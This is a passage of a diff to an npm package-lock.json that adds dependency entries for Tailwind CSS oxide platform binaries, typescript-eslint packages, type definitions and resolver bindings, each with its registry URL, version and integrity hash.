"resolved": "https://registry.npmjs.org/@tailwindcss/oxide/-/oxide-4.2.4.tgz", + "integrity": "sha512-9El/iI069DKDSXwTvB9J4BwdO5JhRrOweGaK25taBAvBXyXqJAX+Jqdvs8r8gKpsI/1m0LeJLyQYTf/WLrBT1Q==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">= 20" + }, + "optionalDependencies": { + "@tailwindcss/oxide-android-arm64": "4.2.4", + "@tailwindcss/oxide-darwin-arm64": "4.2.4", + "@tailwindcss/oxide-darwin-x64": "4.2.4", + "@tailwindcss/oxide-freebsd-x64": "4.2.4", + "@tailwindcss/oxide-linux-arm-gnueabihf": "4.2.4", + "@tailwindcss/oxide-linux-arm64-gnu": "4.2.4", + "@tailwindcss/oxide-linux-arm64-musl": "4.2.4", + "@tailwindcss/oxide-linux-x64-gnu": "4.2.4", + "@tailwindcss/oxide-linux-x64-musl": "4.2.4", + "@tailwindcss/oxide-wasm32-wasi": "4.2.4", + "@tailwindcss/oxide-win32-arm64-msvc": "4.2.4", + "@tailwindcss/oxide-win32-x64-msvc": "4.2.4" + } + }, + "node_modules/@tailwindcss/oxide-android-arm64": { + "version": "4.2.4", + "resolved": "https://registry.npmjs.org/@tailwindcss/oxide-android-arm64/-/oxide-android-arm64-4.2.4.tgz", + "integrity": "sha512-e7MOr1SAn9U8KlZzPi1ZXGZHeC5anY36qjNwmZv9pOJ8E4Q6jmD1vyEHkQFmNOIN7twGPEMXRHmitN4zCMN03g==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "android" + ], + "engines": { + "node": ">= 20" + } + }, + "node_modules/@tailwindcss/oxide-darwin-arm64": { + "version": "4.2.4", + "resolved": "https://registry.npmjs.org/@tailwindcss/oxide-darwin-arm64/-/oxide-darwin-arm64-4.2.4.tgz", + "integrity": "sha512-tSC/Kbqpz/5/o/C2sG7QvOxAKqyd10bq+ypZNf+9Fi2TvbVbv1zNpcEptcsU7DPROaSbVgUXmrzKhurFvo5eDg==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "darwin" + ], + "engines": { + "node": ">= 20" + } + }, + "node_modules/@tailwindcss/oxide-darwin-x64": { + "version": "4.2.4", + "resolved": "https://registry.npmjs.org/@tailwindcss/oxide-darwin-x64/-/oxide-darwin-x64-4.2.4.tgz", + "integrity": "sha512-yPyUXn3yO/ufR6+Kzv0t4fCg2qNr90jxXc5QqBpjlPNd0NqyDXcmQb/6weunH/MEDXW5dhyEi+agTDiqa3WsGg==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "darwin" + ], + "engines": { + "node": ">= 20" + } + }, + "node_modules/@tailwindcss/oxide-freebsd-x64": { + "version": "4.2.4", + "resolved": "https://registry.npmjs.org/@tailwindcss/oxide-freebsd-x64/-/oxide-freebsd-x64-4.2.4.tgz", + "integrity": "sha512-BoMIB4vMQtZsXdGLVc2z+P9DbETkiopogfWZKbWwM8b/1Vinbs4YcUwo+kM/KeLkX3Ygrf4/PsRndKaYhS8Eiw==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "freebsd" + ], + "engines": { + "node": ">= 20" + } + }, + "node_modules/@tailwindcss/oxide-linux-arm-gnueabihf": { + "version": "4.2.4", + "resolved": "https://registry.npmjs.org/@tailwindcss/oxide-linux-arm-gnueabihf/-/oxide-linux-arm-gnueabihf-4.2.4.tgz", + "integrity": "sha512-7pIHBLTHYRAlS7V22JNuTh33yLH4VElwKtB3bwchK/UaKUPpQ0lPQiOWcbm4V3WP2I6fNIJ23vABIvoy2izdwA==", + "cpu": [ + "arm" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">= 20" + } + }, + "node_modules/@tailwindcss/oxide-linux-arm64-gnu": { + "version": "4.2.4", + "resolved": "https://registry.npmjs.org/@tailwindcss/oxide-linux-arm64-gnu/-/oxide-linux-arm64-gnu-4.2.4.tgz", + "integrity": "sha512-+E4wxJ0ZGOzSH325reXTWB48l42i93kQqMvDyz5gqfRzRZ7faNhnmvlV4EPGJU3QJM/3Ab5jhJ5pCRUsKn6OQw==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">= 20" + } + }, + "node_modules/@tailwindcss/oxide-linux-arm64-musl": { + "version": "4.2.4", + "resolved": "https://registry.npmjs.org/@tailwindcss/oxide-linux-arm64-musl/-/oxide-linux-arm64-musl-4.2.4.tgz", + "integrity": "sha512-bBADEGAbo4ASnppIziaQJelekCxdMaxisrk+fB7Thit72IBnALp9K6ffA2G4ruj90G9XRS2VQ6q2bCKbfFV82g==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">= 20" + } + }, + "node_modules/@tailwindcss/oxide-linux-x64-gnu": { + "version": "4.2.4", + "resolved": "https://registry.npmjs.org/@tailwindcss/oxide-linux-x64-gnu/-/oxide-linux-x64-gnu-4.2.4.tgz", + "integrity": "sha512-7Mx25E4WTfnht0TVRTyC00j3i0M+EeFe7wguMDTlX4mRxafznw0CA8WJkFjWYH5BlgELd1kSjuU2JiPnNZbJDA==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">= 20" + } + }, + "node_modules/@tailwindcss/oxide-linux-x64-musl": { + "version": "4.2.4", + "resolved": "https://registry.npmjs.org/@tailwindcss/oxide-linux-x64-musl/-/oxide-linux-x64-musl-4.2.4.tgz", + "integrity": "sha512-2wwJRF7nyhOR0hhHoChc04xngV3iS+akccHTGtz965FwF0up4b2lOdo6kI1EbDaEXKgvcrFBYcYQQ/rrnWFVfA==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">= 20" + } + }, + "node_modules/@tailwindcss/oxide-wasm32-wasi": { + "version": "4.2.4", + "resolved": "https://registry.npmjs.org/@tailwindcss/oxide-wasm32-wasi/-/oxide-wasm32-wasi-4.2.4.tgz", + "integrity": "sha512-FQsqApeor8Fo6gUEklzmaa9994orJZZDBAlQpK2Mq+DslRKFJeD6AjHpBQ0kZFQohVr8o85PPh8eOy86VlSCmw==", + "bundleDependencies": [ + "@napi-rs/wasm-runtime", + "@emnapi/core", + "@emnapi/runtime", + "@tybys/wasm-util", + "@emnapi/wasi-threads", + "tslib" + ], + "cpu": [ + "wasm32" + ], + "dev": true, + "license": "MIT", + "optional": true, + "dependencies": { + "@emnapi/core": "^1.8.1", + "@emnapi/runtime": "^1.8.1", + "@emnapi/wasi-threads": "^1.1.0", + "@napi-rs/wasm-runtime": "^1.1.1", + "@tybys/wasm-util": "^0.10.1", + "tslib": "^2.8.1" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@tailwindcss/oxide-win32-arm64-msvc": { + "version": "4.2.4", + "resolved": "https://registry.npmjs.org/@tailwindcss/oxide-win32-arm64-msvc/-/oxide-win32-arm64-msvc-4.2.4.tgz", + "integrity": "sha512-L9BXqxC4ToVgwMFqj3pmZRqyHEztulpUJzCxUtLjobMCzTPsGt1Fa9enKbOpY2iIyVtaHNeNvAK8ERP/64sqGQ==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "win32" + ], + "engines": { + "node": ">= 20" + } + }, + "node_modules/@tailwindcss/oxide-win32-x64-msvc": { + "version": "4.2.4", + "resolved": "https://registry.npmjs.org/@tailwindcss/oxide-win32-x64-msvc/-/oxide-win32-x64-msvc-4.2.4.tgz", + "integrity": "sha512-ESlKG0EpVJQwRjXDDa9rLvhEAh0mhP1sF7sap9dNZT0yyl9SAG6T7gdP09EH0vIv0UNTlo6jPWyujD6559fZvw==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "win32" + ], + "engines": { + "node": ">= 20" + } + }, + "node_modules/@tailwindcss/postcss": { + "version": "4.2.4", + "resolved": "https://registry.npmjs.org/@tailwindcss/postcss/-/postcss-4.2.4.tgz", + "integrity": "sha512-wgAVj6nUWAolAu8YFvzT2cTBIElWHkjZwFYovF+xsqKsW2ADxM/X2opxj5NsF/qVccAOjRNe8X2IdPzMsWyHTg==", + "dev": true, + "license": "MIT", + "dependencies": { + "@alloc/quick-lru": "^5.2.0", + "@tailwindcss/node": "4.2.4", + "@tailwindcss/oxide": "4.2.4", + "postcss": "^8.5.6", + "tailwindcss": "4.2.4" + } + }, + "node_modules/@tailwindcss/postcss/node_modules/postcss": { + "version": "8.5.13", + "resolved": "https://registry.npmjs.org/postcss/-/postcss-8.5.13.tgz", + "integrity": "sha512-qif0+jGGZoLWdHey3UFHHWP0H7Gbmsk8T5VEqyYFbWqPr1XqvLGBbk/sl8V5exGmcYJklJOhOQq1pV9IcsiFag==", + "dev": true, + "funding": [ + { + "type": "opencollective", + "url": "https://opencollective.com/postcss/" + }, + { + "type": "tidelift", + "url": "https://tidelift.com/funding/github/npm/postcss" + }, + { + "type": "github", + "url": "https://github.com/sponsors/ai" + } + ], + "license": "MIT", + "dependencies": { + "nanoid": "^3.3.11", + "picocolors": "^1.1.1", + "source-map-js": "^1.2.1" + }, + "engines": { + "node": "^10 || ^12 || >=14" + } + }, + "node_modules/@tybys/wasm-util": { + "version": "0.10.1", + "resolved": "https://registry.npmjs.org/@tybys/wasm-util/-/wasm-util-0.10.1.tgz", + "integrity": "sha512-9tTaPJLSiejZKx+Bmog4uSubteqTvFrVrURwkmHixBo0G4seD0zUxp98E1DzUBJxLQ3NPwXrGKDiVjwx/DpPsg==", + "dev": true, + "license": "MIT", + "optional": true, + "dependencies": { + "tslib": "^2.4.0" + } + }, + "node_modules/@types/estree": { + "version": "1.0.8", + "resolved": "https://registry.npmjs.org/@types/estree/-/estree-1.0.8.tgz", + "integrity": "sha512-dWHzHa2WqEXI/O1E9OjrocMTKJl2mSrEolh1Iomrv6U+JuNwaHXsXx9bLu5gG7BUWFIN0skIQJQ/L1rIex4X6w==", + "dev": true, + "license": "MIT" + }, + "node_modules/@types/json-schema": { + "version": "7.0.15", + "resolved": "https://registry.npmjs.org/@types/json-schema/-/json-schema-7.0.15.tgz", + "integrity": "sha512-5+fP8P8MFNC+AyZCDxrB2pkZFPGzqQWUzpSeuuVLvm8VMcorNYavBqoFcxK8bQz4Qsbn4oUEEem4wDLfcysGHA==", + "dev": true, + "license": "MIT" + }, + "node_modules/@types/json5": { + "version": "0.0.29", + "resolved": "https://registry.npmjs.org/@types/json5/-/json5-0.0.29.tgz", + "integrity": "sha512-dRLjCWHYg4oaA77cxO64oO+7JwCwnIzkZPdrrC71jQmQtlhM556pwKo5bUzqvZndkVbeFLIIi+9TC40JNF5hNQ==", + "dev": true, + "license": "MIT" + }, + "node_modules/@types/node": { + "version": "22.19.17", + "resolved": "https://registry.npmjs.org/@types/node/-/node-22.19.17.tgz", + "integrity": "sha512-wGdMcf+vPYM6jikpS/qhg6WiqSV/OhG+jeeHT/KlVqxYfD40iYJf9/AE1uQxVWFvU7MipKRkRv8NSHiCGgPr8Q==", + "dev": true, + "license": "MIT", + "dependencies": { + "undici-types": "~6.21.0" + } + }, + "node_modules/@types/react": { + "version": "19.2.14", + "resolved": "https://registry.npmjs.org/@types/react/-/react-19.2.14.tgz", + "integrity": "sha512-ilcTH/UniCkMdtexkoCN0bI7pMcJDvmQFPvuPvmEaYA/NSfFTAgdUSLAoVjaRJm7+6PvcM+q1zYOwS4wTYMF9w==", + "devOptional": true, + "license": "MIT", + "dependencies": { + "csstype": "^3.2.2" + } + }, + "node_modules/@types/react-dom": { + "version": "19.2.3", + "resolved": "https://registry.npmjs.org/@types/react-dom/-/react-dom-19.2.3.tgz", + "integrity": "sha512-jp2L/eY6fn+KgVVQAOqYItbF0VY/YApe5Mz2F0aykSO8gx31bYCZyvSeYxCHKvzHG5eZjc+zyaS5BrBWya2+kQ==", + "dev": true, + "license": "MIT", + "peerDependencies": { + "@types/react": "^19.2.0" + } + }, + "node_modules/@typescript-eslint/eslint-plugin": { + "version": "8.59.0", + "resolved": "https://registry.npmjs.org/@typescript-eslint/eslint-plugin/-/eslint-plugin-8.59.0.tgz", + "integrity": "sha512-HyAZtpdkgZwpq8Sz3FSUvCR4c+ScbuWa9AksK2Jweub7w4M3yTz4O11AqVJzLYjy/B9ZWPyc81I+mOdJU/bDQw==", + "dev": true, + "license": "MIT", + "dependencies": { + "@eslint-community/regexpp": "^4.12.2", + "@typescript-eslint/scope-manager": "8.59.0", + "@typescript-eslint/type-utils": "8.59.0", + "@typescript-eslint/utils": "8.59.0", + "@typescript-eslint/visitor-keys": "8.59.0", + "ignore": "^7.0.5", + "natural-compare": "^1.4.0", + "ts-api-utils": "^2.5.0" + }, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + }, + "peerDependencies": { + "@typescript-eslint/parser": "^8.59.0", + "eslint": "^8.57.0 || ^9.0.0 || ^10.0.0", + "typescript": ">=4.8.4 <6.1.0" + } + }, + "node_modules/@typescript-eslint/eslint-plugin/node_modules/ignore": { + "version": "7.0.5", + "resolved": "https://registry.npmjs.org/ignore/-/ignore-7.0.5.tgz", + "integrity": "sha512-Hs59xBNfUIunMFgWAbGX5cq6893IbWg4KnrjbYwX3tx0ztorVgTDA6B2sxf8ejHJ4wz8BqGUMYlnzNBer5NvGg==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">= 4" + } + }, + "node_modules/@typescript-eslint/parser": { + "version": "8.59.0", + "resolved": "https://registry.npmjs.org/@typescript-eslint/parser/-/parser-8.59.0.tgz", + "integrity": "sha512-TI1XGwKbDpo9tRW8UDIXCOeLk55qe9ZFGs8MTKU6/M08HWTw52DD/IYhfQtOEhEdPhLMT26Ka/x7p70nd3dzDg==", + "dev": true, + "license": "MIT", + "dependencies": { + "@typescript-eslint/scope-manager": "8.59.0", + "@typescript-eslint/types": "8.59.0", + "@typescript-eslint/typescript-estree": "8.59.0", + "@typescript-eslint/visitor-keys": "8.59.0", + "debug": "^4.4.3" + }, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + }, + "peerDependencies": { + "eslint": "^8.57.0 || ^9.0.0 || ^10.0.0", + "typescript": ">=4.8.4 <6.1.0" + } + }, + "node_modules/@typescript-eslint/project-service": { + "version": "8.59.0", + "resolved": "https://registry.npmjs.org/@typescript-eslint/project-service/-/project-service-8.59.0.tgz", + "integrity": "sha512-Lw5ITrR5s5TbC19YSvlr63ZfLaJoU6vtKTHyB0GQOpX0W7d5/Ir6vUahWi/8Sps/nOukZQ0IB3SmlxZnjaKVnw==", + "dev": true, + "license": "MIT", + "dependencies": { + "@typescript-eslint/tsconfig-utils": "^8.59.0", + "@typescript-eslint/types": "^8.59.0", + "debug": "^4.4.3" + }, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + }, + "peerDependencies": { + "typescript": ">=4.8.4 <6.1.0" + } + }, + "node_modules/@typescript-eslint/scope-manager": { + "version": "8.59.0", + "resolved": "https://registry.npmjs.org/@typescript-eslint/scope-manager/-/scope-manager-8.59.0.tgz", + "integrity": "sha512-UzR16Ut8IpA3Mc4DbgAShlPPkVm8xXMWafXxB0BocaVRHs8ZGakAxGRskF7FId3sdk9lgGD73GSFaWmWFDE4dg==", + "dev": true, + "license": "MIT", + "dependencies": { + "@typescript-eslint/types": "8.59.0", + "@typescript-eslint/visitor-keys": "8.59.0" + }, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + } + }, + "node_modules/@typescript-eslint/tsconfig-utils": { + "version": "8.59.0", + "resolved": "https://registry.npmjs.org/@typescript-eslint/tsconfig-utils/-/tsconfig-utils-8.59.0.tgz", + "integrity": "sha512-91Sbl3s4Kb3SybliIY6muFBmHVv+pYXfybC4Oolp3dvk8BvIE3wOPc+403CWIT7mJNkfQRGtdqghzs2+Z91Tqg==", + "dev": true, + "license": "MIT", + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + }, + "peerDependencies": { + "typescript": ">=4.8.4 <6.1.0" + } + }, + "node_modules/@typescript-eslint/type-utils": { + "version": "8.59.0", + "resolved": "https://registry.npmjs.org/@typescript-eslint/type-utils/-/type-utils-8.59.0.tgz", + "integrity": "sha512-3TRiZaQSltGqGeNrJzzr1+8YcEobKH9rHnqIp/1psfKFmhRQDNMGP5hBufanYTGznwShzVLs3Mz+gDN7HkWfXg==", + "dev": true, + "license": "MIT", + "dependencies": { + "@typescript-eslint/types": "8.59.0", + "@typescript-eslint/typescript-estree": "8.59.0", + "@typescript-eslint/utils": "8.59.0", + "debug": "^4.4.3", + "ts-api-utils": "^2.5.0" + }, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + }, + "peerDependencies": { + "eslint": "^8.57.0 || ^9.0.0 || ^10.0.0", + "typescript": ">=4.8.4 <6.1.0" + } + }, + "node_modules/@typescript-eslint/types": { + "version": "8.59.0", + "resolved": "https://registry.npmjs.org/@typescript-eslint/types/-/types-8.59.0.tgz", + "integrity": "sha512-nLzdsT1gdOgFxxxwrlNVUBzSNBEEHJ86bblmk4QAS6stfig7rcJzWKqCyxFy3YRRHXDWEkb2NralA1nOYkkm/A==", + "dev": true, + "license": "MIT", + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + } + }, + "node_modules/@typescript-eslint/typescript-estree": { + "version": "8.59.0", + "resolved": "https://registry.npmjs.org/@typescript-eslint/typescript-estree/-/typescript-estree-8.59.0.tgz", + "integrity": "sha512-O9Re9P1BmBLFJyikRbQpLku/QA3/AueZNO9WePLBwQrvkixTmDe8u76B6CYUAITRl/rHawggEqUGn5QIkVRLMw==", + "dev": true, + "license": "MIT", + "dependencies": { + "@typescript-eslint/project-service": "8.59.0", + "@typescript-eslint/tsconfig-utils": "8.59.0", + "@typescript-eslint/types": "8.59.0", + "@typescript-eslint/visitor-keys": "8.59.0", + "debug": "^4.4.3", + "minimatch": "^10.2.2", + "semver": "^7.7.3", + "tinyglobby": "^0.2.15", + "ts-api-utils": "^2.5.0" + }, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + }, + "peerDependencies": { + "typescript": ">=4.8.4 <6.1.0" + } + }, + "node_modules/@typescript-eslint/typescript-estree/node_modules/balanced-match": { + "version": "4.0.4", + "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-4.0.4.tgz", + "integrity": "sha512-BLrgEcRTwX2o6gGxGOCNyMvGSp35YofuYzw9h1IMTRmKqttAZZVU67bdb9Pr2vUHA8+j3i2tJfjO6C6+4myGTA==", + "dev": true, + "license": "MIT", + "engines": { + "node": "18 || 20 || >=22" + } + }, + "node_modules/@typescript-eslint/typescript-estree/node_modules/brace-expansion": { + "version": "5.0.5", + "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-5.0.5.tgz", + "integrity": "sha512-VZznLgtwhn+Mact9tfiwx64fA9erHH/MCXEUfB/0bX/6Fz6ny5EGTXYltMocqg4xFAQZtnO3DHWWXi8RiuN7cQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "balanced-match": "^4.0.2" + }, + "engines": { + "node": "18 || 20 || >=22" + } + }, + "node_modules/@typescript-eslint/typescript-estree/node_modules/minimatch": { + "version": "10.2.5", + "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-10.2.5.tgz", + "integrity": "sha512-MULkVLfKGYDFYejP07QOurDLLQpcjk7Fw+7jXS2R2czRQzR56yHRveU5NDJEOviH+hETZKSkIk5c+T23GjFUMg==", + "dev": true, + "license": "BlueOak-1.0.0", + "dependencies": { + "brace-expansion": "^5.0.5" + }, + "engines": { + "node": "18 || 20 || >=22" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, + "node_modules/@typescript-eslint/utils": { + "version": "8.59.0", + "resolved": "https://registry.npmjs.org/@typescript-eslint/utils/-/utils-8.59.0.tgz", + "integrity": "sha512-I1R/K7V07XsMJ12Oaxg/O9GfrysGTmCRhvZJBv0RE0NcULMzjqVpR5kRRQjHsz3J/bElU7HwCO7zkqL+MSUz+g==", + "dev": true, + "license": "MIT", + "dependencies": { + "@eslint-community/eslint-utils": "^4.9.1", + "@typescript-eslint/scope-manager": "8.59.0", + "@typescript-eslint/types": "8.59.0", + "@typescript-eslint/typescript-estree": "8.59.0" + }, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + }, + "peerDependencies": { + "eslint": "^8.57.0 || ^9.0.0 || ^10.0.0", + "typescript": ">=4.8.4 <6.1.0" + } + }, + "node_modules/@typescript-eslint/visitor-keys": { + "version": "8.59.0", + "resolved": "https://registry.npmjs.org/@typescript-eslint/visitor-keys/-/visitor-keys-8.59.0.tgz", + "integrity": "sha512-/uejZt4dSere1bx12WLlPfv8GktzcaDtuJ7s42/HEZ5zGj9oxRaD4bj7qwSunXkf+pbAhFt2zjpHYUiT5lHf0Q==", + "dev": true, + "license": "MIT", + "dependencies": { + "@typescript-eslint/types": "8.59.0", + "eslint-visitor-keys": "^5.0.0" + }, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + } + }, + "node_modules/@typescript-eslint/visitor-keys/node_modules/eslint-visitor-keys": { + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/eslint-visitor-keys/-/eslint-visitor-keys-5.0.1.tgz", + "integrity": "sha512-tD40eHxA35h0PEIZNeIjkHoDR4YjjJp34biM0mDvplBe//mB+IHCqHDGV7pxF+7MklTvighcCPPZC7ynWyjdTA==", + "dev": true, + "license": "Apache-2.0", + "engines": { + "node": "^20.19.0 || ^22.13.0 || >=24" + }, + "funding": { + "url": "https://opencollective.com/eslint" + } + }, + "node_modules/@unrs/resolver-binding-android-arm-eabi": { + "version": "1.11.1", + "resolved": "https://registry.npmjs.org/@unrs/resolver-binding-android-arm-eabi/-/resolver-binding-android-arm-eabi-1.11.1.tgz", + "integrity": "sha512-ppLRUgHVaGRWUx0R0Ut06Mjo9gBaBkg3v/8AxusGLhsIotbBLuRk51rAzqLC8gq6NyyAojEXglNjzf6R948DNw==", + "cpu": [ + "arm" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "android" + ] + }, + "node_modules/@unrs/resolver-binding-android-arm64": { + "version": "1.11.1", + "resolved": "https://registry.npmjs.org/@unrs/resolver-binding-android-arm64/-/resolver-binding-android-arm64-1.11.1.tgz", + "integrity": "sha512-lCxkVtb4wp1v+EoN+HjIG9cIIzPkX5OtM03pQYkG+U5O/wL53LC4QbIeazgiKqluGeVEeBlZahHalCaBvU1a2g==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "android" + ] + }, + "node_modules/@unrs/resolver-binding-darwin-arm64": { + "version": "1.11.1", + "resolved": "https://registry.npmjs.org/@unrs/resolver-binding-darwin-arm64/-/resolver-binding-darwin-arm64-1.11.1.tgz", + "integrity": "sha512-gPVA1UjRu1Y/IsB/dQEsp2V1pm44Of6+LWvbLc9SDk1c2KhhDRDBUkQCYVWe6f26uJb3fOK8saWMgtX8IrMk3g==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "darwin" + ] + }, + "node_modules/@unrs/resolver-binding-darwin-x64": { + "version": "1.11.1", + "resolved": "https://registry.npmjs.org/@unrs/resolver-binding-darwin-x64/-/resolver-binding-darwin-x64-1.11.1.tgz", + "integrity": "sha512-cFzP7rWKd3lZaCsDze07QX1SC24lO8mPty9vdP+YVa3MGdVgPmFc59317b2ioXtgCMKGiCLxJ4HQs62oz6GfRQ==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "darwin" + ] + }, + "node_modules/@unrs/resolver-binding-freebsd-x64": { + "version": "1.11.1", + "resolved": "https://registry.npmjs.org/@unrs/resolver-binding-freebsd-x64/-/resolver-binding-freebsd-x64-1.11.1.tgz", + "integrity": "sha512-fqtGgak3zX4DCB6PFpsH5+Kmt/8CIi4Bry4rb1ho6Av2QHTREM+47y282Uqiu3ZRF5IQioJQ5qWRV6jduA+iGw==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "freebsd" + ] + }, + "node_modules/@unrs/resolver-binding-linux-arm-gnueabihf": { + "version": "1.11.1", + "resolved": "https://registry.npmjs.org/@unrs/resolver-binding-linux-arm-gnueabihf/-/resolver-binding-linux-arm-gnueabihf-1.11.1.tgz", + "integrity": "sha512-u92mvlcYtp9MRKmP+ZvMmtPN34+/3lMHlyMj7wXJDeXxuM0Vgzz0+PPJNsro1m3IZPYChIkn944wW8TYgGKFHw==", + "cpu": [ + "arm" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ] + }, + "node_modules/@unrs/resolver-binding-linux-arm-musleabihf": { + "version": "1.11.1", + "resolved": "https://registry.npmjs.org/@unrs/resolver-binding-linux-arm-musleabihf/-/resolver-binding-linux-arm-musleabihf-1.11.1.tgz", + "integrity": "sha512-cINaoY2z7LVCrfHkIcmvj7osTOtm6VVT16b5oQdS4beibX2SYBwgYLmqhBjA1t51CarSaBuX5YNsWLjsqfW5Cw==", + "cpu": [ + "arm" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ] + }, + "node_modules/@unrs/resolver-binding-linux-arm64-gnu": { + "version": "1.11.1", + "resolved": "https://registry.npmjs.org/@unrs/resolver-binding-linux-arm64-gnu/-/resolver-binding-linux-arm64-gnu-1.11.1.tgz", + "integrity": "sha512-34gw7PjDGB9JgePJEmhEqBhWvCiiWCuXsL9hYphDF7crW7UgI05gyBAi6MF58uGcMOiOqSJ2ybEeCvHcq0BCmQ==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ] + }, + "node_modules/@unrs/resolver-binding-linux-arm64-musl": { + "version": "1.11.1", + "resolved": "https://registry.npmjs.org/@unrs/resolver-binding-linux-arm64-musl/-/resolver-binding-linux-arm64-musl-1.11.1.tgz", + "integrity": "sha512-RyMIx6Uf53hhOtJDIamSbTskA99sPHS96wxVE/bJtePJJtpdKGXO1wY90oRdXuYOGOTuqjT8ACccMc4K6QmT3w==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ] + }, + "node_modules/@unrs/resolver-binding-linux-ppc64-gnu": { + "version": "1.11.1", + "resolved": "https://registry.npmjs.org/@unrs/resolver-binding-linux-ppc64-gnu/-/resolver-binding-linux-ppc64-gnu-1.11.1.tgz", + "integrity": "sha512-D8Vae74A4/a+mZH0FbOkFJL9DSK2R6TFPC9M+jCWYia/q2einCubX10pecpDiTmkJVUH+y8K3BZClycD8nCShA==", + "cpu": [ + "ppc64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ] + }, + "node_modules/@unrs/resolver-binding-linux-riscv64-gnu": { + "version": "1.11.1", + "resolved": "https://registry.npmjs.org/@unrs/resolver-binding-linux-riscv64-gnu/-/resolver-binding-linux-riscv64-gnu-1.11.1.tgz", + "integrity": "sha512-frxL4OrzOWVVsOc96+V3aqTIQl1O2TjgExV4EKgRY09AJ9leZpEg8Ak9phadbuX0BA4k8U5qtvMSQQGGmaJqcQ==", + "cpu": [ + "riscv64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ] + }, + "node_modules/@unrs/resolver-binding-linux-riscv64-musl": { + "version": "1.11.1", + "resolved": "https://registry.npmjs.org/@unrs/resolver-binding-linux-riscv64-musl/-/resolver-binding-linux-riscv64-musl-1.11.1.tgz", + "integrity": "sha512-mJ5vuDaIZ+l/acv01sHoXfpnyrNKOk/3aDoEdLO/Xtn9HuZlDD6jKxHlkN8ZhWyLJsRBxfv9GYM2utQ1SChKew==", + "cpu": [ + "riscv64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ] + }, + "node_modules/@unrs/resolver-binding-linux-s390x-gnu": { + "version": "1.11.1", + "resolved": "https://registry.npmjs.org/@unrs/resolver-binding-linux-s390x-gnu/-/resolver-binding-linux-s390x-gnu-1.11.1.tgz", + "integrity": "sha512-kELo8ebBVtb9sA7rMe1Cph4QHreByhaZ2QEADd9NzIQsYNQpt9UkM9iqr2lhGr5afh885d/cB5QeTXSbZHTYPg==", + "cpu": [ + "s390x" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ] + }, + "node_modules/@unrs/resolver-binding-linux-x64-gnu": { + "version": "1.11.1", + "resolved": "https://registry.npmjs.org/@unrs/resolver-binding-linux-x64-gnu/-/resolver-binding-linux-x64-gnu-1.11.1.tgz", + "integrity": 